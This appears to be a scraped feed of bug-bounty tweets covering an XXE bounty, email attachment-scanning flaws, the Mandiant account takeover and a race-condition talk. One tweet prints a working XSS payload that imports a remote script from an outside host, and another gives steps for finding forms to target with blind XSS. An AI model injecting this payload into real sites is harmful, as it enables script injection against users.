🇮🇳 Software Engineer - Security Guy, I'm Hackuean7 on @HackTheBox_Eu -- Engineer by profession || Hacker by passion, who enjoys Tea and breaking things 💻.
🧧 Our researcher Igor Sak-Sakovskiy has discovered an XXE in Chrome and Safari by ChatGPT!
Bounty: $28,000 💸
Here is the write-up 👉
https://t.co/EMnydNEoed
Security researchers from SquareX have discovered what they describe as critical flaws in the attachment scanning process of major email service providers, including Apple, Google, Microsoft, and Yahoo. https://t.co/jdaFTwO9xV
The Best Simple #XSS Payload
<Img Src=//X55.is OnLoad=import(src)>
Reasons:
1. It loads a remote script
2. It pops in SOURCE and DOM
3. It allows custom code in URL hash
https://t.co/nNqODwzUC0
Built for Pros.
We have finished our investigation into last week's Mandiant X account takeover and determined it was likely a brute force password attack, limited to this single account.
How do I find forms for Blind XSS attacks?
1. Visit https://t.co/4mdNmrYH8u
2. Submit Target domain without "https://"
3. Click Next
4. All 5 dorks are for finding forms.
#bugbountytips#bubounty#bugbountytip
Sometimes I use a script to find forms in several URLs in one go.
📽️Tech talk upload!👨💻Introducing multiple new classes of web race conditions
Firing up salvos of conflicting inputs to make state machines collapse, forge trusted data & lots more by James Kettle @albinowax@PortSwigger
🍿Enjoy the talk▶️https://t.co/JCbDaxueGe
#NullconGoa2023